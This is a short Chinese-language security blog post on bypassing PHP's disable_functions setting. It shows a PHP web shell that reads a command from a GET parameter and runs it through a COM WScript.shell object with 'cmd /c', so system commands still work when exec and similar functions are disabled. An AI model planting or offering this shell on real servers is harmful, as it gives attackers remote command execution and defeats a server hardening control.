PHP绕过disable_function方法总结 - WileySec's Blog

PHP绕过disable_function方法总结

本文章主要讲述在php执行disable_function的函数绕过方式总结


Feature


调用COM对象执行命令

前提条件

调用COM对象需要开启扩展

02753-5mlnj5rz6l.png

extension=php_com_dotnet.dll 需要开启此扩展

绕过disable_function禁用的函数

21371-i00zox7a7o.png

disable_function禁用了execevalshell这三个函数

若需要执行系统命令,调用exec函数肯定执行不了

69589-gfkz9zp1zak.png

可以发现执行系统命令是执行不了的

调用COM对象执行命令

<?php 

$cmd = $_GET['a'];

$wsh = new COM('WScript.shell'); // 生成一个COM对象

$exec = $wsh->exec("cmd /c ".$cmd);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

 ?>

94836-tsijpeh4f38.png

通过调用COM对象即可执行系统命令

添加新评论

电子邮件地址不会被公开,评论内容可能需要管理员审核后显示。